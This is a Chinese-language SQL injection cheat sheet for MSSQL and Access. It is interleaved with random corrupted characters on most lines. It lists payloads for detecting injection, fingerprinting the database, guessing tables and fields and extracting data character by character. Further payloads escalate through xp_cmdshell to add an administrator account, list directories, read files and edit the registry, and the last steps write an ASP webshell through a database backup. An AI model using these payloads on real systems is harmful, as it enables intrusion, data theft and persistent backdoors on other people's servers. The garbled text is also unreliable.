1.判断是否有注入;and 1=1 ;and 1=2 K�N��?6;G{
2.初步判断是否是mssql ;and user>0 uk��v�tQz)
�`5~ +,/Ys
3.注入参数是字符'and [查询条件] and ''=' ] ��)F7)�
��@BrMl%gV
4.搜索时没过滤参数的'and [查询条件] and '%25'=' x7vc�tj�M|
u`olW�%C/T
5.判断数据库系统 Q>R>R*1.�j
F29v����a�
;and (select count(*) from sysobjects)>0 mssql {X*^s5{�;H
� ;b�`[&g�
;and (select count(*) from msysobjects)>0 access �j����6��
>IX/<
{);M
Pl<�;�[�cB
u{FD�d�R9<
6.猜数据库 ;and (select Count(*) from [数据库名])>0 E[O<S B
I�
zCOgBT~p��
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 X^\�>�:�<�
�t9�Y=�m6
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 P%�#*-zCCx
Vpr����/��
9.(1)猜字段的ascii值(access) ��K�As�S�[
*1��� G>YH
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 p_Ul��K8rb
uA$<\fnz��
(2)猜字段的ascii值(mssql) m8�5WA
#
`
�?x+Z)`�w_
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 �=)�E,��8L
�6��m VuyI
10.测试权限结构(mssql) t�^�[8R�hD
u5~Ns&o&�N
xS7$%�w[�'
h.�!}3\Y�
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- Gcb|�W�&
H*b�s31�i{
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- @q"�m���5�
2�5NTIzI@@
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- -�F=v6�N�{
@x�eAc0.^
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- "Tm[t?FMbe
,^gy�H�
\�
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- �+3a?`��Z�
P�G8�^.)]M
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- �F�� q!fWl
y�!�5$/`AF
;and 1=(select IS_MEMBER('db_owner'));-- (�ewe"N+�
>7roe []-|
�e5.�h ��?
<,AS8^$X[�
11.添加mssql和系统的帐户 _DrJVC~6@�
d/�}S�Avtt
;exec master.dbo.sp_addlogin username;-- etd&.��.]J
;exec master.dbo.sp_password null,username,password;-- �h'�$QC )P
�rJa$�9B*^
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- k��GL1!=�>
n39t}`W�Il
;exec master.dbo.xp_cmdshell 'net user username password .TE?KI
���
R/^u�/�~<
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- �`+t.�!tv!
l~D N1z6`�
;exec master.dbo.xp_cmdshell 'net user username password /add';-- >6oOZ�bUY0
|��A�%�<Z(
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- �:QWq"cBem
��J*l4|^i<
oQv�3�Gp�O
\�}~s2Y5�j
12.(1)遍历目录 Y-'78�B�Jk
U��x�D5eJJ
;create table dirs(paths varchar(100), id int) }<z_Q�_b+e
�q %0C�g=
;insert dirs exec master.dbo.xp_dirtree 'c:\' hky�;CD~$�
��S!P�zLTc
;and (select top 1 paths from dirs)>0 +dB�z`W�D
LTJ��c,3\,
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) % aUsOB-RV
>HPdzLY?�
D�Ag58
=qJ
R�NPb�H�.
(2)遍历目录 66����#�"
7���~z�twL
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- +fx8muz:y
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 }Z
TGi,P�c
^1Xt]T�`e�
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 }�n7t�h���
bu&t'?z�x!
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 �aF|�d�^��
��`��z0{S!
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 XE3'`D���!
,Rx��{yf]k
�?0_7?yTR/
.�bV�m�qR`
13.mssql中的存储过程 =<@\,xN>C
UZEI:k,dv
xp_regenumvalues 注册表根键, 子键 �x f��4{r+
$�
�n,��Z
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 F`nb21{0y&
Q�Qe;�1��O
xp_regread 根键,子键,键值名 �� �Kl��uA
/H�:I 68~�
;exec xp_regread KO�g�?Fm�D
[T��F8'jI0
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 ^u�S/r��#l
OG3/-K��8R
xp_regwrite 根键,子键, 值名, 值类型, 值 �b dJ+�@r�
E42eOGp9i�
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 @<M*qK1h�
B/G�d(S`@q
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 �cL8#S>>u.
Omi�^>c4G�
xp_regdeletevalue 根键,子键,值名 ?EU\}�N J�
N~pIC2�Woo
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 r}u�%#G+K,
H0a/(4/xg
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 CzV(cSS9-�
{�F�N;'�Uc
J��ti(b*~�
:Vg}V"�Q�R
14.mssql的backup创建webshell ��d�bS
�+�
/D_+�{d�tE
use model ��`]$?�u�Q
M+wt_�_vHf
create table cmd(str image); sA9��&/p/�
�-�n�g=l;
insert into cmd(str) values (''); 19�(D��j&x
�>x3ug]Bu�
backup database model to disk='c:\l.asp'; �Px M!�U!t
kl1Y�] ?z}
E�3a_8@ZB7
W�xb�sD S;
15.mssql内置函数 ���6|J'�>)
�7��GZgu$'
;and (select @@version)>0 获得Windows的版本号 �I8H%=Kb?9
IMQ]1u�q0$
;and user_name()='dbo' 判断当前系统的连接用户是不是sa d���SI�H9D
U,1Afzl�F�
;and (select user_name())>0 爆当前系统的连接用户 /,5�Z-Z*wq
Je4Z�(kj 0
;and (select db_name())>0 得到当前连接的数据库 Ip}Vb��6}
rVQX7l#�YI
�r��OD1_X-
_SZ5P>�GIU
16.简洁的webshell g�Q~�5M'#
oUx[+Gn�v�
use model �^IgY d*5�
jnu�Y{0�(&
create table cmd(str image); IGF��G�a@C
?IX!�+�>.H
insert into cmd(str) values (''); O�l�xX�.wP
�Q\{x)|{�$
backup database model to disk='g:\wwwtest\l.asp';
